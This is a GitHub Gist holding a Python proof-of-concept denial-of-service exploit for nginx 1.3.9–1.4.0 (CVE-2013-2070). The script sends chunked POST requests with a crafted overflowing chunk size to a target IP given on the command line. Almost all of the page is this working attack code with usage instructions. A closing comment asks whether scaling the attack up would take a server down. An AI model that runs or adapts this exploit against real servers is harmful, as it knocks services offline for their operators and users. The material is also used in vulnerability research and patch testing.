Created
February 26, 2014 16:02
-
-
Save infoslack/9232444 to your computer and use it in GitHub Desktop.
Exploit: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) | |
# Google Dork: CVE-2013-2070 | |
# Date: 16.05.2013 | |
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com | |
# Vendor Homepage: http://nginx.org/ | |
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz | |
# Version: 1.3.9-1.4.0 | |
# Tested on: Kali Linux & nginx v1.4.0 | |
# CVE : CVE-2013-2070 | |
import httplib | |
import time | |
import socket | |
import sys | |
import os | |
# Vars & Defs | |
debug = 0 | |
dos_packet = 0xFFFFFFFFFFFFFFEC | |
socket.setdefaulttimeout(1) | |
packet = 0 | |
def chunk(data, chunk_size): | |
chunked = "" | |
chunked += "%s\r\n" % (chunk_size) | |
chunked += "%s\r\n" % (data) | |
chunked += "0\r\n\r\n" | |
return chunked | |
if sys.platform == 'linux-i386' or sys.platform == 'linux2': | |
os.system("clear") | |
elif sys.platform == 'win32': | |
os.system("cls") | |
else: | |
os.system("cls") | |
print "======================================================================" | |
print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) [http://www.mertsarica.com]" | |
print "======================================================================" | |
if len(sys.argv) < 2: | |
print "Usage: python nginx_dos.py [target ip]\n" | |
print "Example: python nginx_dos.py 127.0.0.1\n" | |
sys.exit(1) | |
else: | |
host = sys.argv[1].lower() | |
while packet <= 5: | |
body = "Mert SARICA" | |
chunk_size = hex(dos_packet + 1)[3:] | |
chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper() | |
if debug: | |
print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)] | |
try: | |
con = httplib.HTTPConnection(host) | |
url = "/mertsarica.php" | |
con.putrequest('POST', url) | |
con.putheader('User-Agent', "curl/7.30.0") | |
con.putheader('Accept', "*/*") | |
con.putheader('Transfer-Encoding', 'chunked') | |
con.putheader('Content-Type', "application/x-www-form-urlencoded") | |
con.endheaders() | |
con.send(chunk(body, chunk_size[:len(chunk_size)])) | |
except: | |
print "Connection error!" | |
sys.exit(1) | |
try: | |
resp = con.getresponse() | |
print(resp.status, resp.reason) | |
except: | |
print "[*] Knock knock, is anybody there ? (" + str(packet) + "/5)" | |
packet = packet + 1 | |
con.close() | |
print "[+] Done!" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Is this a reasonable response from the server? When orchestrated in scale, would this cause DOS?
(413, 'Request Entity Too Large')